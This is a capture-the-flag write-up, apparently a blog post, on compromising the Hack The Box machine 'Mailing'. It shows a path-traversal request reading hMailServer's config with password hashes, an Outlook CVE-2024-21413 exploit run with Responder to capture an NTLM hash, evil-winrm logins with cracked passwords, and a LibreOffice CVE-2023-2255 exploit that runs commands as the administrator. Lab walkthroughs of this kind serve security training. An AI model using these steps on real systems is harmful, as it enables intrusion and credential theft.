User.txt
Let’s discover the open ports with nmap
sudo nmap -sS -sV --min-rate 5000 -n -Pn -T4 -vv 10.10.11.14
Output
PORT STATE SERVICE REASON VERSION
25/tcp open smtp syn-ack ttl 127 hMailServer smtpd
80/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
110/tcp open pop3 syn-ack ttl 127 hMailServer pop3d
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
143/tcp open imap syn-ack ttl 127 hMailServer imapd
445/tcp open microsoft-ds? syn-ack ttl 127
465/tcp open ssl/smtp syn-ack ttl 127 hMailServer smtpd
587/tcp open smtp syn-ack ttl 127 hMailServer smtpd
993/tcp open ssl/imap syn-ack ttl 127 hMailServer imapd
Service Info: Host: mailing.htb; OS: Windows; CPE: cpe:/o:microsoft:windows
Let’s add the host to our /etc/hosts file
sudo echo "10.10.11.14 mailing.htb" | sudo tee -a /etc/hosts
Now we will do some enumeration
I found a LFI on the Web Application download function
http://mailing.htb/download.php?file=../../windows/system32/drivers/etc/hosts
And we can get the .ini file of hMailServer
[Directories]
ProgramFolder=C:\Program Files (x86)\hMailServer
DatabaseFolder=C:\Program Files (x86)\hMailServer\Database
DataFolder=C:\Program Files (x86)\hMailServer\Data
LogFolder=C:\Program Files (x86)\hMailServer\Logs
TempFolder=C:\Program Files (x86)\hMailServer\Temp
EventFolder=C:\Program Files (x86)\hMailServer\Events
[GUILanguages]
ValidLanguages=english,swedish
[Security]
AdministratorPassword=841bb5acfa6779ae432fd7a4e6600ba7
[Database]
Type=MSSQLCE
Username=
Password=0a9f8ad8bf896b501dde74f08efd7e4c
PasswordEncryption=1
Port=0
Server=
Database=hMailServer
Internal=1
After crack it, the password is
homenetworkingadministrator
Let’s try log in via Telnet
telnet 10.10.11.14 110
USER administrator@mailing.htb
+OK Send your password
PASS homenetworkingadministrator
+OK Mailbox locked and ready
LIST
+OK 0 messages (0 octets)
I remember the famous CVE of Outlook vuln then I try with this python script
Then you can run
sudo responder -I tun0
python3 CVE-2024-21413.py --server mailing.htb --port 587 --username administrator@mailing.htb --password homenetworkingadministrator --sender administrator@mailing.htb --recipient maya@mailing.htb --url '\IP' --subject test123
Then we get the NTLM hash for maya user!
maya::MAILING:dac4fe0aec512cc8:0ABF7016C9D7428230E543395441DBCD:010100000000000000EF6F99469EDA01293B5F358D9EF4DE0000000002000800540058005800340001001E00570049004E002D00380038003200520041004E005000380044004500500004003400570049004E002D00380038003200520041004E00500038004400450050002E0054005800580034002E004C004F00430041004C000300140054005800580034002E004C004F00430041004C000500140054005800580034002E004C004F00430041004C000700080000EF6F99469EDA01060004000200000008003000300000000000000000000000002000009BE5ABAC0CB766267616E7031B83C21B57E7A52A6903503167DE1974F23E1F3B0A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310034002E0035000000000000000000
Let’s crack it
maya:m4y4ngs4ri
Now we can use evil-winrm for log in
evil-winrm -i 10.10.11.14 -u maya -p m4y4ngs4ri
PS C:\Users\maya\Desktop> type user.txt
463996f3**********68581c
PS C:\Users\maya\Desktop>
And get the user.txt flag
Root.txt
Now it’s time for root
If we enumerate about program installed
reg query HKEY_LOCAL_MACHINE\SOFTWARE
We can see that there is Libre Office
And in C:\ exist Important Documents folder
I drop a file and every minute this is delete… And execute?
May be is the CVE-2023-2255
Let’s clone this repo
git clone https://github.com/elweth-sec/CVE-2023-2255 && cd CVE-2023-2255
After try many methods to get a reverse shell, I took the dirty way, just type the root flag to other .txt file
import subprocess
c = 'type C:\\Users\\localadmin\\Desktop\\root.txt >> C:\\Users\\maya\\Documents\\a.txt'
subprocess.run(c, shell=True)
We can call this script dirt.py and then execute this command:
python3 CVE-2023-2255.py --cmd 'python C:\Users\maya\Documents\dirt.py' --output 'exploit.odt'
We have 2 files, we need copy those to /usr/share/evil-winrm/ folder for upload
sudo cp dirt.py /usr/share/evil-winrm/dirt.py
sudo cp exploit.odt /usr/share/evil-winrm/exploit.odt
Then in our Evil-WinRM
PS C:\Users\maya\Documents> upload dirt.py
PS C:\Users\maya\Documents> cd C:\
PS C:\> cd "C:/Important Documents/"
PS C:\Important Documents> upload exploit.odt
If you can’t see a.txt in Documents folder, just re-upload the .odt file or reset the machine and try again.
We will take a second an will see the a.txt file
PS C:\Important Documents> dir C:\Users\maya\Documents\
Directory: C:\Users\maya\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 3/13/2024 4:49 PM WindowsPowerShell
-a---- 5/5/2024 4:22 AM 34 a.txt
-a---- 4/11/2024 1:24 AM 807 mail.py
-a---- 3/14/2024 4:30 PM 557 mail.vbs
-a---- 5/5/2024 4:14 AM 594 dirt.py
Then
PS C:\Important Documents> cd C:\Users\maya\Documents\
PS C:\Users\maya\Documents> type a.txt
417aa94e*********10c153c430
PS C:\Users\maya\Documents>
We get the root.txt flag
I hope you found it useful (:
Leave a Reply